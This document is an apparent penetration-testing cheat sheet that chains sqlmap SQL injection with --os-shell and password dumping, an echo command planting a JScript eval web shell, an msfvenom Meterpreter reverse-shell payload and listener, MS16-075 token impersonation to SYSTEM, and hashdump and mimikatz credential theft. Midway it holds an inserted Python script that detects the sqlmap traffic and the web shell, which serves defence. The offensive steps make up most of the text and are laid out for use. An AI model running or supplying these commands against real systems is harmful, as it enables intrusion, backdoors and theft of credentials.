Summary of sqlmap injection and MS16-075 privilege escalation
(1) sqlmap commands, in the order they are run
sqlmap.py -r 1**.***.***.***.txt
sqlmap.py -r 1**.***.***.***.txt --is-dba
sqlmap.py -r 1**.***.***.***.txt --passwords --batch
sqlmap.py -r 1**.***.***.***.txt --os-shell
(2) Commands run inside the os-shell
ipconfig
dir c:\
echo "This is test" > e:\software\ams_noflow\t.txt
echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > E:\software\AMS_Noflow\cmd.aspx
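The os-shell stage above leaves two artefacts a defender can look for: HTTP requests that carry sqlmap's default User-Agent or stacked queries calling xp_cmdshell (the route sqlmap uses for command execution on MSSQL), and a freshly written .aspx file whose body is the eval(Request.Item[...], "unsafe") one-liner. The script below is an added example, not part of the original post; the IIS-style log lines, the web-root layout and the page contents are constructed for the demonstration, and the indicator names are my own.

```python
"""Defender-side checks for the sqlmap --os-shell stage (added example, not from the original post)."""
import os
import re
import tempfile
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (W3C fields: date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status cs(User-Agent)). Lines 2 and 3 mimic the injection chain; the rest is normal traffic.
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET /product.aspx id=1 200 Mozilla/5.0+(Windows+NT+10.0)
2024-01-01 10:00:02 203.0.113.5 GET /product.aspx id=1%27%3BEXEC+master..xp_cmdshell+%27ipconfig%27-- 500 sqlmap/1.7.2%23stable+(https://sqlmap.org)
2024-01-01 10:00:03 203.0.113.5 GET /product.aspx id=1;EXEC+sp_configure+%27xp_cmdshell%27,1-- 200 Mozilla/5.0+(Windows+NT+10.0)
2024-01-01 10:00:04 198.51.100.9 GET /product.aspx id=2 200 Mozilla/5.0+(Windows+NT+10.0)
"""

XP_CMDSHELL = re.compile(r"xp_cmdshell", re.IGNORECASE)


def parse_log_line(line):
    """Split one W3C-style line into named fields; returns None for blank or malformed lines."""
    parts = line.split(None, 7)
    if len(parts) != 8:
        return None
    _date, _time, client_ip, method, stem, query, status, agent = parts
    # IIS percent-encodes the query and writes spaces in the User-Agent as '+'; decode both.
    return {"client_ip": client_ip, "method": method, "stem": stem,
            "query": unquote_plus(query), "status": status, "agent": unquote_plus(agent)}


def detect_os_shell_activity(log_text):
    """Return one finding per suspicious line: {"line", "client_ip", "reasons"}."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_log_line(line)
        if rec is None:
            continue
        reasons = []
        if rec["agent"].lower().startswith("sqlmap/"):
            reasons.append("sqlmap user-agent")
        if XP_CMDSHELL.search(rec["query"]):
            reasons.append("xp_cmdshell in query")
        if reasons:
            findings.append({"line": number, "client_ip": rec["client_ip"], "reasons": reasons})
    return findings


# Indicators of the eval(Request.Item[...], "unsafe") one-liner the echo command writes.
WEBSHELL_INDICATORS = [
    ("eval(Request...) sink", re.compile(r"eval\s*\(\s*request\.item\s*\[", re.IGNORECASE)),
    ('"unsafe" eval mode', re.compile(r'"unsafe"')),
]

# Constructed page bodies: an ordinary page and the dropped one-liner.
BENIGN_PAGE = '<%@ Page Language="C#" %><html><body>Hello</body></html>'
SUSPECT_PAGE = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'


def looks_like_webshell(source):
    """Return the names of every indicator that matches the page source."""
    return [name for name, pattern in WEBSHELL_INDICATORS if pattern.search(source)]


def scan_webroot(root):
    """Walk a web root and report server-side script files that match any indicator."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".aspx", ".asp", ".ashx")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                matched = looks_like_webshell(fh.read())
            if matched:
                hits[path] = matched
    return hits


def demo_scan():
    """Build a throwaway web root with one benign and one suspect page; return {filename: indicators}."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.aspx", BENIGN_PAGE), ("cmd.aspx", SUSPECT_PAGE)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.basename(p): v for p, v in scan_webroot(root).items()}


if __name__ == "__main__":
    for f in detect_os_shell_activity(SAMPLE_LOG):
        print(f"log line {f['line']} from {f['client_ip']}: {', '.join(f['reasons'])}")
    for name, indicators in demo_scan().items():
        print(f"{name}: {', '.join(indicators)}")
```

Run it against a real IIS log by passing the file contents to detect_os_shell_activity and a real web root to scan_webroot; the User-Agent check only catches tools left at their defaults, so the xp_cmdshell and file-content checks are the ones to rely on.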
(3) Generating the payload with MSF
Generate the reverse-connection payload:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.33 lport=4433 -f exe -o 4433.exe
(4) Starting MSF and listening
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33 (in practice a public IP address)
set LPORT 4433
exploit
(5) MS16-075 privilege-escalation commands
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid
(6) Dumping the password hashes
run hashdump
(7) Obtaining passwords with mimikatz
load mimikatz
kerberos, livessp, msv, ssp, tspkg, wdigest (try each command in turn; some of them show clear-text passwords)
mimikatz_command: runs a command in the mimikatz command prompt
(8) Obtaining passwords from the mimikatz command line (not tested)
privilege::debug
sekurlsa::logonpasswords